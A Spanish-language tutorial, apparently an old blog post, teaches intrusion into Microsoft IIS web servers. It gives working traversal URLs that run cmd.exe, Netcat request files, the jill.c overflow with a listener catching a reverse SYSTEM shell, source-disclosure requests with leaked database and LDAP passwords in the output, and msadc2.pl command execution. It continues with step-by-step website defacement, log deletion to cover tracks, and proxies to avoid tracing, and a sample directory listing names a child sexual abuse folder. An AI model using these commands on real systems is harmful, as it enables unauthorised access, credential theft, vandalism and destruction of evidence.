perl y luego en Bin y usalo en ms-dos como ahi podras ver.!
O tambien la forma facil de volada si es ke no tienen el programa ese
a la mano.. pongan el string mas facil y corton en su web address Ejem:
www.victima.com/scripts/..%255c../winnt/system32/cmd.exe/c+dir+c:\
enter y si les sale algo como a continuacion van bien hasta ahorita!
Traten de usar proxies es recomendable al menos ke estes en un cybercafe hoho!
podran hayar suficientes en www.cyberarmy.com/lists.
bueno espero y les salga algo como esto a continuacion:
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ah ke bien ya tamos adentro, cheken por mas particiones en el server
puede ke no nomas sea C: sino d: o los 2 o hasta mas g: f: etc..!
Tambien podemos usar Netcat pa ke nos salga eso , haciendo lo mismo ke la ves
pasada creamos un texto llamado decode.txt y le ponemos la siguiente string:
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
[carriage return]
[carriage return]
Y esto mas o menos sera el resultado a la hora de redireccionarlo con Netcat:
c:\nc>nc -vv www.victim.com 80 <\ decode.txt
www.victim.com [195.23.43.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIs/5.0
Date: Mon, 15 June 2001 16:03:35 GMT
Content-type: application/octect-stream
Volume in drive C has no label.
Volume Serial Number is 8631-765F
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ya ven ahi ta !! :)
Tambien pueden obtener algo parecido al ejemplo anterior y ejecutar comandos
a la ves tambien con el decodexecute2.pl ejem: ( tamos usandolo desde linux).
[root@maximus ipmazter]# perl -x decodexecute.pl www.victim.com:80 'dir'
Executing dir on 209.34.65.xxx:80
HTTP/1.1 200 OK
Server: Microsoft-IIs/4.0
Date: Mon, 23 May 2000 01:23:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label
Volume Serial Number is F984-772F
Directory of C:\Inetpub\scripts
12/10/01 08:54a DIR..
01/27/02 12:00a DIR...
2 file(s) 10 bytes
15,345,324 bytes free
Bueno parece ser ke podemos ya ejecutar comandos, ya lo ke hagan de ahi
es problema suyo , usen su imaginacio. :D
-----------------------------------------------------------------------------
Todo lo anterior fue con la falla del decode , ahora veremos la falla del
IIs 5.0 printer overflow. ( jill.c ) veamos ocupamos el exploit llamado jill.c
ke lo puedes bajar de la pagina de securenterprise bajo la seccion de exploits
Y jill.c se corren en *nix ya tengas una shell o tu makina con linux.
Aunke tambien hay una version de ese exploit para win32 llamado IIs5-Koei
que lo puedes bajar tambien en la misma seccion ke del jill.c ..Ocuparas el
Netcat tambien aki y aki si es de afuerzitas. ahorita veran porque..
Ahora vemos como usaremos la falla del printer overflow y usaremos primero
el exploit version del win32 llamado IIs5-Koei..
solo tienen ke poner la web del server IIs 5.0 ke kieren ver si es vulnerable
y enter, pero primero poner tu netcat en escucha en el puerto 7882 por ke
ese puerto te dice el programa ke uses. :
c:\nc>nc -v -v -L -p 7882
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 7882... <-- ahi ya esta en escucha en ese puerto.
si llega a ser vulnerable el sitio ese. te mandara una shella tu pc y veras
algo como esto Ejem:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Como pueden ver ya tienen acceso al server como NT Authority\system.
Ahora miraremos como se usa el jill.c bajo linux :D
compilamos el exploit y veremos el usage!..
[root@maximus ipmazter]#cc jill.c -o jill
[root@maximus ipmazter]# ./jill
iis5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
usage: ./jill
Ok bueno el exploit asi se usa tienes ke poner a netcat (pa *nix) en escucha
en el puerto ke kieres ke este en escucha. aki usare el 2003.
[root@maximus ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
ok ya esta ahora ejecutar el exploit...!
[root@fbi.gov ipmazter]#./jill 209.victims.ip 80 200.your.ip.addr 2003
IIs5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
Connecting...
Sent...
You may need to send a carriage on ur listener if the shell doesnt
appear ok ! <-- ese mensaje te saldra automaticamente ke le aplastes
enter unas 2 veces en donde tienes el listener pa ver si te da la shell.
si te sale algo asi ya pudistes!
[root@fbi.gov ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
connect to [209.xx.xxx.xxx] from etc [209.xx.xxx.xx] 1117
[ carriage return ]
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Bueno ya vemos ke si agarro y ya tamos adentro ahora ya tenemos acceso
como NT AUTHORITY\SYSTEM y ahi pueden ver hize un " whoami" pa ver ke pex.!
------------------------------------------------------------------------------
Ahora hablaremos de la vulnerabilidad translate: f , es explotada por otro
IIs 5,0 ISAPI.DLL, httpx.dll, ke implementa Web Distributed Authoring y
Versioning IIs 5.0. WebDav is a microsoft-backed standard ke especifica
como autores remotos pueden editar y manejar Web Server Content por http.
Aki podemos hacer otro texto preconfigurado usando netcat como lo hemos
hecho ya anteriormente.
GET /global.asa\ HTTP/1.0
Translate: f
[CRLF]
[CRLF]
y redirecciona el texto ke hagas atraves de netcat al site vulnerable,
el source code del global.asa aparecera en texto. llamemos el texto ke
redireccionaremos ( fvul.txt )
c:\nc>nc -vv www.victim.com 80 <\ fvul.txt
www.victim.com [209.23.54.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: application/octect-stream
Content-Length: 2790
Etag: "3874fdf79dff:kio"
Last-Modified: Mon, 21 Jan 2002 09:30:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
<\objectRUNAT=Server SCOPE=Session ID=fixit PROGID="secure.object\">
("ConnectionText") = "DSN=phone;UID=stalker;Password=fuckoff
("ConnectionText") = "DSN=Backend;UID=stalker;PWD=test;"
("LDAPServer") = "LDAP://ldap.secureco.com:389"
("LDAPUserID") = "cn=Admin"
("LDAPPwd") = "Password"
Como podran ver , hemos agarrado los passwds de multiples servers , incluyendo
un LDAP system. Ya hay un perl script ke te lo hara esto mas facil aun se llama
srcgrab.pl ( Srcgrab.pl exploits the Translate:f bug. la vulnerabilidad presente
en los IIs4.0 y 5.0 y Windows 2000 frontpage extensiones, hace ke un atacante
remoto vea el source code de las paginas .asp y .asa del server victima.
---------------------------------------------------------------------------------
Ahora hablaremos sobre la falla del msadc/rds. y esta sera la ultima de este
tutorial. hay un exploit llamado msadc2.pl ya listo en la red y lo puedes hayar
en securenterprise en la seccion de perl scripts. esta falla te deja ejecutar
comandos arbitrarios al webserver IIs 4.0. ahorita veremos un simple ejemplo
de un deface con el masdc2.pl a el server victima. si nos sale cmd/c !!
kiere decir ke ya la hicimos a lo mejor! el ejemplo sera en linux!
[root@fbi.gov ipmazter]# perl -x msadc2.pl -h www.victim.com
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c echo IpMazter Ownz Ur site > c:\inetpub\wwwroot\index.htm
(asumiendo index.htm es la pagina principal de www.victim.com )
como ven solo le hice un echo al index. lo mas facil.!
TIP: ahora no solo por ke con el decode o con cualkiera otro de estos diga
"vulnerable " wow! poss nel.. todavia hay ke ver si tiene write access el web
folder. :( . asi es como podemos saber . aki usare la falla del decode pa ke vean
ya ke es la mas kemada de todas :).. hehe.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
asi de simple pa saber si tiene acceso de escritura. no tiene ke ser siempre
el folder de scripts , hay muchos mas. en cualkier parte de la red pueden ver las
demas strings.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
ok aki de nuevo si te sale algo como esto kiere decir ke vas bien:..
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(1) files copied.
:) bueno vamos muy bien.parace ke si tenemos acceso de escritura en el server.
si les sale algo como en ves de lo anterior y ven esto:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(o) files copied <-- no acceso de escritura ya te chingastes mejor vete
a ver ke otro hayas :(
tambien podemos hacer este tambien o los 2 , etc.
www.victim.com/scripts/..etc.../c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd2.exe
si dice iwal ke arriba ke (1) files copied , perfecto!!
----------------------------------------------------------------------------------
Ahora trataremos de subir nuestro hack.html en este caso pa hacerle deface.
puedes usar tu ftp de tu pc ke ya trae por defecto , o bajarte un cliente de ftp
como ws ftp pro o ftp serv-u aunke ese esta mas bien pa cuando haces defaces a los
*nix. luego lo comentare en el siguiente texto de defacing linux , etc.
Aki muestro un ejemplo facil con el ftp por defecto de la pc de uno.
ojala ke tenga acceso anonimo y tenga un directorio con acceso de escritura
C:\>ftp
ftp> open
To www.victim.com
Connected to www.victim.com
220 home Microsoft FTP Service (Version 3.0).
User (www.victim.com:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password
Password:
230 Anonymous user logged in. <-- acceso anonimo perfecto
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
dwnload
iomega
kerner
LAserJ5L
napv2b7.exe
Netscape.exe
226 Transfer complete. <-muy bien!
ftp: 62 bytes received in 0.16Seconds 0.39Kbytes/sec.
ftp> put hack.html
200 PORT command successful. <-- si dice 550 hack.html acceso denegado , entonces usaremos otros metodos.
150 Opening ASCII mode data connection for 'hack.html'.
226 Transfer complete.
ftp: 1235 bytes received in 0.64Seconds 0.45Kbytes/sec.
ftp> put hack.jpg
200 PORT command successful.
150 Opening ASCII mode data connection for 'hack.jpg'.
226 Transfer complete.
ftp: 1300 bytes received in 0.15Seconds 0.35Kbytes/sec.
ftp> quit
221
Ahi como pudieron ver como subi el hack.html y la foto ke ira en el deface!
Ahora veremos con lo del decode donde jodidos esta nuestro .html
mayoria de veces uno lo hayara en c:\inetpub\ftproot , veamos:
Directory of c:\Inetpub
02/28/01 02:15p DIR .
02/28/01 02:15p DIR ..
05/04/01 10:46a DIR ftproot
05/04/01 11:36a DIR gophroot
03/03/02 03:26a DIR scripts
02/28/01 02:16p 722 site_definition.wst
03/03/02 02:37a DIR wwwroot
7 File(s) 722 bytes
ahora escalemos al dir de ftproot :D
Directory of c:\Inetpub\ftproot
05/04/01 10:46a DIR .
05/04/01 10:46a DIR ..
05/04/01 10:46a DIR dwnload
03/03/02 11:54a hack.html <-- ahi esta nuestro html =)
03/03/02 11:54a hack.jpg
11/30/00 06:03a DIR iomega
05/14/01 10:46a DIR kerner
11/30/00 06:03a DIR LAserJ5L
08/22/00 07:13a 1,696,777 napv2b7.exe
08/28/00 09:05a 20,002,801 Netscape.exe
10 File(s) 21,699,578 bytes
454,900,736 bytes free
ahora ke ya lo tenemos arriba en el server , primero debemos saber donde jodidos
esta la web ..
www.victim.com/scripts/..%255c../winnt/system32/cmd.exe?/c+set
y obetendremos algo como esto..:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=SERVER_SII
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=en-us
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.victim.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StarBand Version 2.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=your.ip.address.hehe <- or the proxy ip.
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\DMI\win32\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
PATH_TRANSLATED=C:\Inetpub\wwwroot\ <-------------ahi esta el dir. de la web :)
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
Nunca siempre estara donde mismo el directorio por defecto es el
c:\inetpub\wwwroot\ylaweb.html
ahora pueden ir a ese dir. y ver donde esta el index.html o el default.htm
pero muchas veces veran un monton de .html's .asp's etc.. htm's. y dices utta!!
cual de todas seran ingao !!muy facil! vete al www.sitio.com. ya ke estas ahi
calale con los nombres de las paginas mas kemadas ke hay
www.site.com/index.html <-- asi escribelo tu
www.site.com/index.htm
www.site.com/default.htm
www.site.com/default.asp
etc....
pero la ke se aparesca como ejem: www.site.com/index.htm entonces la web
se llama index.htm y como ya sabes donde esta pos dale gas rapidin.:)
puede ke los dir. de donde esta la web varee . por ejemplo en ves de estar en
c:\inetpub\wwwroot puede estar en d:\inetpub\web\keves\akinoesta\
etc.. hehe! por eso te servira un poco el comando del set. pa y mirar el
path_translated y te diga donde esta situada la web principal
Y si nomas no das una con hayarla puedes hacer un search por la web ejemplo:
www.victim.com/etc....etc.. cmd.exe?/c+dir+/S+c:\*.html
y te saldra algp parecido a esto..:
Directory of c:\Dell\Drivers\28693
07/30/99 11:22a 857 Setup.html
1 File(s) 857 bytes
Directory of c:\InetPub\WWWroot\samples
07/26/00 10:16a 1,548 index.html
1 File(s) 1,548 bytes
y saldran massss!! hehe. ahi tu te las ingenuas !
ok ahora ke ya sabemos ke se llama index.htm ok.. y ke esta en el dir. de
c:\inetpub\wwwroot\ pos es hora de copiar nuestro hack.html ahi :)
www.victim.com/scripts/..%255c../inetpub/scripts/cmd2.exe?/c+copy+c:\inetpub\ftproot\hack.html+c:\inetpub\wwwroot\index.html
si te sale solo el error de CGI esta bien ! si te sale algo de access denied pos
kiere decir ke no tiene acceso de escritura el web folder y te la has pelado :(
como pueden ver ahi copie mi hack.html de ftproot por ke ahi estaba y lo mande al
dir. de la web original del server. hagan los mismo con la foto!
ahora metete a www.site.com , dale refresh y si sale pos felicidades y si no pos
ya te jodistes! o algo anda mal. ve y checa de nuevo en ke podistes haber fallado.
Ahora supongamos ke no podistes subir por ftp. por ke no tenia acceso anonimo el
el ftp o si tenia pero no habia directorios con escritura y no podias hacer
uploads al server. :( o simplemente ni ftp tenian o lo tienen firewalled etc..
Usaremos tftp ( trivial file transfer protocol / es el puerto UDP 69)
ese puerto tambien puede ke este deshabilitado por el admin o este firewalled, etc
bueno supongamos ke no hagamos lo siguiente.. bajemonos el cliente de tftp
pueden hayarlo en mi web de securenterprise, bajo free software.
instalemonos en nuestra pc y configuremoslo. etc.. el comando seria asi. ejem:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+tftp+-i+Your.Ip.Adrres.+GET+hack.html+c:\inetpub\wwwroot\index.html
Ya ves lo subimos por tftp y lo copeamos en el dir. domde kieras o en ese. ahi tu
luego lo acomodas si lo pones en otro folder.
Ahora si asi tampoco se llegara a poder ingaoo!! pos usaremos el echo command
es muy facil y simple. mayoria de gente webas lo usa! hehe
POdemos calar si podemos hacerle echo al index , y esto como prueba:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+echo>+>c:\inetpub\wwwroot\hoho.html
ahi esta el comando de prueba. si no algo de acceso denegado o otra mensada vas
bien, y vete si kieres a www.site.com/hoho.html y veras ke dira " Echo is on"
kiere decir ke de seguro podremos hacerle echo al index.html :)
www.victim.com/...etc../inetpub/scripts/cmd2.exe?/c+echo+
Hacked!
defaced By
by
IpMazter
"+>c:\inetpub\wwwroot\index.html
como vemos en ese comando de echo le meti codigo html pa ke se vea mejor aun
el deface con el comando del echo. :)
O uno simple nomas www.site.com/..etc../inetpub/scripts/cmd2.exe?/c+echo+IpMazter hacked you+>c:\inetpub\wwwroot\index.html
y ya vayanse a www.site.com y refresh y ya veran!!el simple deface . bueno es todo
por ahorita sobre defacing IIs servers ( Winblowz) hehe. ahora borremos LOGS!!
Ok mayoria de logs los hayaras en :
www.victim.com..etc.,,,/c+dir+c:\winnt\system32\logfiles
or
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
ahi los veras tu.. estan asi de esta manera :
in020321.log or ex020321.log etc..
in020321.log = year 2002 the 03 for march the date 21 :)
Un simple ejemplo de como se ve :
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
Directory of c:\winnt\system32\logfiles\w3svc1
02-03-21 01:48p DIR .
02-03-21 01:48p DIR ..
00-09-05 12:18a 423,909 in000904.log
00-09-06 12:00a 571,107 in000905.log
00-09-07 12:00a 771,947 in000906.log
00-09-07 03:49p 196,608 in000907.log
00-09-09 12:00a 474,393 in000908.log
00-09-10 12:01a 1,114,833 in000909.log
00-09-11 12:00a 455,745 in000910.log
00-09-12 07:00a 360,205 in000911.log
ahi tan los logs!! uyy a borrar solo los ke creemos ke debemos borarr
TIP: varias veces no podras el del dia mismo ke estas en el sistema,
pero borra el de ayer si kieres etc.. pa ke veas si puedes borrarlos.
y ya al dia siguiente entra y borralo. el del dia ke estuvistes haciendo
el desmadre si es ke el admin. no lo parcho ya! de inmediato. etc..
cuando no puedas veras algo como asi ejem:
CGI Error
The specified CGI application misbehaved by not etc,,,,
c:\winnt\system32\logfiles\w3svc1\in020321.log
The process cannot access the file because
it is being used by another process.
utts!! :( ni pex hasta ke pegue la 12am pa borrarlo hehe
o si traias proxy ke te valga de borrarlos.
ahora aki ta el comando pa borarr los logs :
www.victim.com/...etc../c+del+c:\winnt\system32\logfiles\w3svc1\in020320.log
enter y enga!! ya se borro .
Ahora ke ya le haygas hecho deface ahora mandalo a archivar claro ke no sea
un redefacedments por ke se ve lame! lo archivas en defaced.alldas.org
email= defaced@alldas.org o a www.zone-h.com ahi veras como se mandan ahi
pa archivarlos :)
Bueno ya me harte aki hay varios comandos pa ke se diviertan les puede servir
de util en algo kien sabe :
--------------------------------------------------------------------------
www.victim.com/...etc.../winnt/system32/net.exe?view+ /domain
www.victim.com/...etc../winnt/system32/net.exe?view
www.victim.com/..etc../winnt/system32/tracert.exe?IP
www.vicitm.com/..etc../winnt/system32/ping.exe?IP
www.victim.com/..etc......./c+md+c:\IpMazter_was_here -- create a directory
www.victim.com/..etc......./c+copy+c:\loko.txt+c:\users\texts -- copys loko.txt to that directory
www.victim.com/..etc......./c+type+c:\loko.txt -- see whats inside O_O
www.victim.com/..etc......./c+del+c:\loko.txt -- deleting
www.victim.com/..etc......./c+copy+c:\loko.txt and then www.victim.com/scripts/loko.txt
hay mas maneras de hacer un download:)
Bueno aki les mando unos links etc,, y las tools ke se usaron aki no todas casi
nmap: www.insecure.org/nmap
netcat: www.securenterprise.org/downloads/tools/nc11.nt.zip
netcat for linux: www.securenterprise.org/downloads/tools/nc110.tar
decodecheck.pl: www.securenterprise.org/downloads/perl/decodecheck.pl
msadc2.pl : www.securenterprise.org/downloads/perl/msadc2.pl
srcgrab.pl: www.securenterprise.org/downloads/perl/srcgrab.pl
jill.c : www.securenterprise.org/downloads/exploits/jill.c
decodexecute.pl : www.securenterprise.org/downloads/exploits/sensedecode.tgz
Subscriure's a:
Missatges (Atom)